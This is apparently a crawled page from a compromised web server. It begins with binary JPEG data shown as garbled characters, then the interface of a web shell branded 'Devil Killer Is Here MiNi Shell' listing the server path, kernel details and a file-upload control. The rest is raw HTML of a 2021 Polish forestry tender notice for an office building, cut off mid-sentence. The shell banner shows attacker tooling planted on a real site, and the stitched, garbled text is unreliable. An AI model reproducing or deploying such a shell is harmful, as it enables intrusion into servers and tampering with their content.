JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019786901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Nazwa zamówienia: „Budowa kancelarii 3 stanowiskowej w Leśnictwie Damówka - przetarg V” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO LUBIN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931023983</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Spółdzielcza 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lubin@wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lubin.wroclaw.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> prowadzenie gospodarki leśnej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nazwa zamówienia: „Budowa kancelarii 3 stanowiskowej w Leśnictwie Damówka - przetarg V” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-faecfadb-21d8-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00197869</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00075240/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 „Budowa kancelarii 3 stanowiskowej w Leśnictwie Damówka”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.gov.pl/web/nadlesnictwo-lubin/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, przy użyciu<br/>miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu miniPortalu.<br/>Szczegółowe informacje dotyczące przyjętego<br/>w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1 niniejszej SWZ.<br/>Uwaga! Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do<br/>komunikacji.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii<br/>dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a) Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 –<br/>„RODO”) Zamawiający informuje, iż administratorem danych osobowych są Lasy Państwowe<br/>Nadleśnictwo Lubin. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Tomasz<br/>Nowiński, z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować<br/>się za pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.82.2020</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowią roboty budowlane dla zadania: „Budowa kancelarii 3<br/>stanowiskowej w Leśnictwie Damówka”. Celem robót jest budowa budynku biurowego kancelarii<br/>stanowiący samodzielną jednostkę wchodzącą w skład struktur organizacyjnych Skarbu<br/>Państwa - dokładniej w skład Państwowych Gospodarstw Leśnych Lasów Państwowych.<br/>Przedmiot zamówienia także zagospodarowanie terenu: wykonanie dojść, dojazdów, miejsc<br/>postojowych, przyłączy oraz miejsca składowania odpadów stałych z możliwością segregacji.<br/>Obiekt przeznaczony jest do wykonywania czynności kancelaryjno - administracyjnych i<br/>przyjmowania interesantów w sprawach związanych z realizacją zadań leśnictwa w ramach<br/>prowadzonej gospodarki leśnej. Obiekt ten wyposażony jest w pomieszczenia przeznaczone do<br/>pracy biurowej, pomieszczenia socjalne, sanitarne, gospodarcze oraz poczekalnie – przedmiot<br/>zamówienia nie obejmuje wyposażenia pomieszczeń biurowych – mebli. Projektowane<br/>pomieszczenia są przystosowane do użytkowania przez osoby niepełnosprawne. Obiekt stanowi<br/>miejsce pracy sześciu ludzi tj. pracowników administracyjnych (trzech leśniczych i trzech<br/>podleśniczych). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45211100-0 - Roboty budowlane w zakresie domów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45211000-9 - Roboty budowlane w zakresie budownictwa wielorodzinnego i domów jednorodzinnych</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał<br/>spełnienie kryteriów (1% = 1 pkt):Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena (koszt) 60%<br/>2.Gwarancja 40%<br/>Razem 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w<br/>postępowaniu dotyczący/-e:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności do występowania w<br/>obrocie gospodarczym., jeżeli wykonawca prowadzący działalność gospodarczą lub zawodową<br/>będzie wpisany do jednego z rejestrów zawodowych lub handlowych: Krajowego Rejestru<br/>Sądowego (KRS), Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG) lub<br/>innego rejestru prowadzonego w państwie członkowskim Unii Europejskiej, w którym posiada<br/>siedzibę lub miejsce zamieszkania. Warunek dotyczący wpisu do odpowiedniego rejestru odnosi<br/>się wyłącznie od wykonawców prowadzących działalność gospodarczą lub zawodową, nie<br/>dotyczy osób fizycznych nieprowadzących działalności gospodarczej.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, jeżeli: „Nie dotyczy”.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie sytuacji ekonomicznej lub<br/>finansowej jeżeli: wykonawca wykaże posiadanie środków finansowych lub zdolności kredytowej<br/>w wysokości nie mniejszej niż 100 000,00 (sto tysięcy złotych).<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności technicznej lub<br/>zawodowej, jeżeli:<br/>a) Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu (zakończeniu) w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, co najmniej 1 zadania polegającego na budowie<br/>obiektów wykonanych w technologii lekkiego szkieletu drewnianego z izolacją z wełny mineralnej<br/>lub drewnianej o wartości 500 000,00 zł (pięćset tysięcy ) PLN.<br/>b) Wykonawca musi wskazać osobę, która będzie uczestniczyć w wykonywaniu zamówienia,<br/>legitymującą się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do pełnienia<br/>funkcji Kierownika Budowy. Musi posiadać odpowiednie do przedmiotu zamówienia uprawnienia<br/>do sprawowania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno –<br/>budowlanej, minimum 5 – letnie doświadczenie w prowadzeniu robót. Samodzielna funkcja<br/>techniczna może być pełniona także przez osoby, których odpowiednie kwalifikacje zawodowe<br/>zostały uznane na zasadach określonych w Ustawie z dnia 22 grudnia 2015r. r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii europejskiej (Dz.<br/>U. z 2016 r. poz. 65) posiadającą uprawnienia budowlane w konstrukcyjno-budowlanej.<br/>Wykonawca na wyżej wymienioną funkcję, wskaże osobę, którą musi dysponować na etapie<br/>realizacji zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) wykaz usług porównywalnych z usługami stanowiącymi przedmiot zamówienia, w przypadku<br/>świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 5 lat od dnia w którym<br/>upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych usług), dat wykonania (dat<br/>dziennych rozpoczęcia i zakończenia realizacji) i podmiotów, na rzecz których usługi zostały wykonane<br/>(wzór wykazu wykonanych usług stanowi załącznik do SWZ),<br/>b) Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonanych wspólnie z innymi<br/>wykonawcami informacje, o których mowa wyżej dotyczą usług faktycznie przez niego wykonanych, a<br/>w przypadku świadczeń powtarzających się lub ciągłych - również faktycznie przez niego<br/>wykonywanych.<br/>c) dowody, że wskazane przez Wykonawcę usługi na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane<br/>lub są wykonywane należycie, Dowodami, o których mowa powyżej są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie Wykonawcy.<br/>d) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem, Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć<br/>wymaganych przez Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 9.1. lit<br/>d) SWZ, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnienie opisanego przez Zamawiającego warunku udziału w postępowaniu<br/>dotyczącego sytuacji ekonomicznej lub finansowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">f) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1<br/>pkt 1 i 2 PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka karnego, (c) art. 109 ust. 1 pkt 2 lit a) PZP, (d) art. 109 ust. 1 pkt 2 lit b) PZP,<br/>odnośnie do skazania za wykroczenie, za które wymierzono karę aresztu, (e) art. 109 ust. 1 pkt 3 PZP,<br/>odnośnie do skazania za przestępstwo lub wykroczenie, za które wymierzona karę aresztu -wystawioną nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>g) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę<br/>lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia<br/>Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej<br/>grupy kapitałowej stanowi załącznik do SWZ),<br/>h) wykreślone<br/>i) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawione nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków i opłat wraz z<br/>zaświadczeniem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych podatków wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności,<br/>j) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt<br/>1 PZP, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>k) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>Podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do<br/>reprezentowania, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność. Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu<br/>składania ofert, wnieść wadium w kwocie: 5 000,00 (słownie: pięć 